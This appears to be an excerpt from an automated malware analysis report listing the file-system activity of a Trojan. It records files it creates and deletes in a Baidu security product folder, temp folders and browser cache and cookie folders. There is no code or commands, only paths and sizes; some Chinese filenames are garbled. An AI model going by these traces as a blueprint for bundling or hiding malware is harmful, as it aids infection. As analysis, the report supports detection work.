%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSysFixer\SysFixerLuaScript.dat (145 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMDownload.dll (324 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\GlobalPluginInfo.xml (25 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSWManager\sw_appassext.dat (2 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\blacksign.dat (537 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\BDMProcessRunningTime.dll (82 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\BDMNet.dll (1358 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\BDMTray\TrayPlugin.rdb (3 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOCleanerScript.dat (58 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMBase.dll (5442 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmkvscanplugin\BDMKVScanPluginContainerConfig.xml (380 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\BDMNetMon_WIN7_x86.sys (601 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\KVMain.rdb (55 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\Mainpage.rdb (3831 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\SafePlugin.rdb (4 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSysFixer\SysFixerConfig.dat (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_5_speed.png (15 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\百度å«士\å¸载百度å«士.lnk (796 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\Unknownfile.rdb (48 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\websafe\WebSafe.dll (6428 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\CompatibilityChecker.dll (140 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOTraceCleanerConfig.dat (5 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_6_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmtrayplugins\BDMTrayTipsPlugin.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmpatcherplugins\BDMPatcher.dll (5442 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDSWShellExt64.dll (3664 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSysFixer\pluginUnit.dat (727 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\BDMReport.dll.bdl (35046 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\BDMSOCleaner\SOTraceConfig.xml (9 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmtrayplugins\BDMSOAccTrayPlugin.dll (3733 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMTips.exe (3743 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\BaiduAnCache.rptc (552 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x64\bd0001.sys (160 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmkvscanplugin\BDMKVScanPlugin.dll (3745 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\SOManager.rdb (1741 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSWManager\homepage.ini (361 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmsusplugins\BDMSOAccSusPlugin.dll (3737 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\BDMSOLiveAccDataMgr.dll (168 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bd0002.dll (1749 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\BDMCoolyPlugins\BDMCoolyContainerConfig.xml (465 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_4_speed.png (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\hu.dll (3312 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\patch\publish.db (30058 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x64\BDArKit.sys (80 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\Patcher.rdb (143 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmpatcherplugins\PatcherContainer.xml (563 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\Pizmdb.7z (188613 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\DriverManager.dll (119 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMSWParseDetect.dll (1613 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSWManager\SWCatalogDataItem.xml (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_8_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_7_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMWindowsLib.dll (99 bytes)
%Documents and Settings%\All Users\Desktop\百度å«士.lnk (811 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\GameNoDisturb.ini (215 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMNet.dll (6392 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmsafeplugins\SafePluginContainerConfig.xml (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\sd\BDLogicUtils.dll (3832 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmtrayplugins\BDMSOCleanerTrayPlugin.dll (3757 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\BDAVCache.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\EnhanceBoost.dll (275 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\systemfile.dat (3 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_blank_speed.png (14 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_9_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\Softmgr.rdb (690 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_3_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\BDMSOLiveAccEngine.dll (111 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x86\BDMNetMon_XP_x86.sys (95 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMReport.dll (5442 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_0_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\BDEnhanceBoost.sys (96 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x86\bd0002.sys (205 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x64\BDMNetMon_WIN7_x64.sys (109 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\GCCommunicate.dll (28 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bd0001.dll (131 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_second_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\licenses\duilib license.txt (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\BDArKit.sys (601 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\BDKV.rdb (29 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\bduf.dll (3823 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMFrameWork.dll (271 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmsafeplugins\BDMPatcherPlugin.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\RTPPlugins\HIPS.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SYSAccMgrDll.dll (3761 bytes)
%System%\drivers\BDArKit.sys (601 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmswmanagerplugins\BDMSWManagerView.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDALeakfixer.exe (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\BDMSOManagerPlugins\BDMSOCleanerPlugin.dll (15801 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\BDDownload\2015604100\Setting\host.dat (306 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSWManager\sw_extlist.dat (3 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\BDMNetMonMgrDll.dll (62 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOCleanerConfig.dat (6 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\StartupDict.dat (1783 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\RTPPlugins\RtpContainerConfig.xml (474 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMPatchAgent.dll (37 bytes)
The Trojan deletes the following file(s):
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back\x86\bd0002.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\Pizmdb.7z (0 bytes)
C:\sds (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca.bak (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\sd\FileMon.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp (0 bytes)
%Program Files%\Baidu\sds (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh4.tmp (0 bytes)
%Program Files%\Baidu\BaiduAn\sds (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back\BDMWrench.sys (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\sd\BDLogicUtils.dll (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back\x86\BDMNetMon_WIN7_x86.sys (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back\x64 (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDDownloader.exe (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back\x64\bd0002.sys (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\BDMNetMon_WIN7_x86.sys (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bg_tips_speed_win8.png (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca.bak (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\sd (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back\x86\BDMNetMon_XP_x86.sys (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\patch (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back\BDEnhanceBoost.sys (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back\x86 (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMTips.exe (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back\x86\BDArKit.sys (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back\x64\BDMNetMon_WIN7_x64.sys (0 bytes)
%Program Files%\sds (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back\x64\BDArKit.sys (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back\x64\bd0001.sys (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back\x86\bd0001.sys (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\patch\publish.db (0 bytes)
The process BDASWAcc.exe:316 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\jquery.min[2].js (6467 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\iepngfix_tilebg[2].js (628 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\iepngfix_tilebg[1].js (105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\selected_page[1].html (719 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\jquery.min[1].js (6022 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\selected_page[1].htm (10 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\jquery.min[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\iepngfix_tilebg[1].js (0 bytes)
The process Ainqngz5.2.exe:1136 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\core[1].php (751 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\snapshot-game[2].jpg (2563 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\CAJQTKHL.gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[13].jpg (1404 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\openicon[1].png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\select-normal[1].png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\snapshot-game[2].jpg (554 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[10].jpg (3658 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\banner-kingston-20140815[1].jpg (27043 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\analytics[2].js (3574 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[2].jpg (4640 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@hm.baidu[1].txt (164 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\home-hack[1].css (265 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[5].jpg (4787 bytes)
%Documents and Settings%\%current user%\UserData\YJM90VAL\www.fengyunzhibo[1].xml (478 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\fengyunzhibo[1] (1850 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@web.log.kukuplay[1].txt (244 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\CAQJ8FJ8.gif (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\nav-bk[1].png (126 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (6220 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\jquery-1.8.3.min[1].js (62713 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\user-icon[1].png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\gameicon_s[1].png (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\default_avatar_s[1].png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\hm[2].js (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\header-v3[2].css (1361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\select-deep[1].png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\fengyunzhibo[1].htm (2358 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\h[1].js (176 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\snapshot-game[4].jpg (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\snapshot-game[4].jpg (1144 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\QQüƬ20140316001047[1].jpg (30227 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\header-v3[2].js (3255 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\snapshot-game[3].jpg (585 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.fengyunzhibo[2].txt (355 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\snapshot-game[1].jpg (1511 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\modernizr.custom.72764[2].js (130 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\analytics[1].js (2827 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\VGXC.tmp (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\snapshot-game[1].jpg (2274 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\fyminiloader-min[1].js (363 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\DD_belatedPNG_0.0.8a-min[1].js (3814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\box-v3[1].js (3 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@log.kukuplay[2].txt (460 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[9].jpg (4187 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\snapshot-game[1].jpg (1731 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\atrk[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\CA8D6JGD.gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\hm[3].js (82 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\lib[1].js (778 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\home-v3[1].png (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\CAXPJNAK.gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\box-v3[2].js (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\snapshot-game[4].jpg (3347 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\header-v3[1].css (1106 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\home-v4[1].js (10653 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[3].jpg (5088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[12].jpg (3048 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\home-hack[2].css (446 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[1].jpg (1384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\snapshot-game[3].jpg (1176 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\loading[1].gif (8152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\home-v4[1].css (2617 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[7].jpg (1974 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[11].jpg (2814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\zhibo2[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[6].jpg (770 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\header-v3-media[1].css (612 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\fystat.min[1].js (25 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@log.kukuplay[1].txt (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\sporticon_s[1].png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\core[1].php (750 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz.mmstat[1].txt (205 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\stat[1].php (4386 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@fengyunzhibo[2].txt (1186 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[4].jpg (3096 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\c[1].php (1163 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\report[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\hm[1].js (387 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[8].jpg (1977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\fyminiloader-min[2].js (660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\home-v3[1].png (15800 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\snapshot-game[5].jpg (789 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\header-v3[1].js (1761 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\h[2].js (817 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\json2[1].js (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\lib[2].js (2 bytes)
%Documents and Settings%\%current user%\UserData\2Z89WTQV\www.fengyunzhibo[1].xml (266 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\atrk[2].js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\1pc[1].png (95 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\snapshot-game[3].jpg (42 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@fengyunzhibo[1].txt (1758 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.fengyunzhibo[1].txt (892 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\snapshot-game[5].jpg (2336 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\hyyy_ban[1].png (38404 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\cover_bk[1].png (68 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\CAEJCPMJ.gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\artsicon_s[1].png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\system[1].js (1561 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@tv.aiqingzhihui[1].txt (257 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\banner_bk[1].png (2878 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\modernizr.custom.72764[1].js (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\snapshot-game[2].jpg (3371 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\atrk[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\header-v3[1].css (0 bytes)
%Documents and Settings%\%current user%\UserData\2Z89WTQV\www.fengyunzhibo[1].xml (0 bytes)
%Documents and Settings%\%current user%\UserData\2Z89WTQV\www.aaa[1].xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\h[1].js (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@fengyunzhibo[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.fengyunzhibo[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.fengyunzhibo[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\CAQJ8FJ8.gif (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@log.kukuplay[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\analytics[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\home-hack[1].css (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\fyminiloader-min[1].js (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@fengyunzhibo[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\report[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\box-v3[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\hm[1].js (0 bytes)
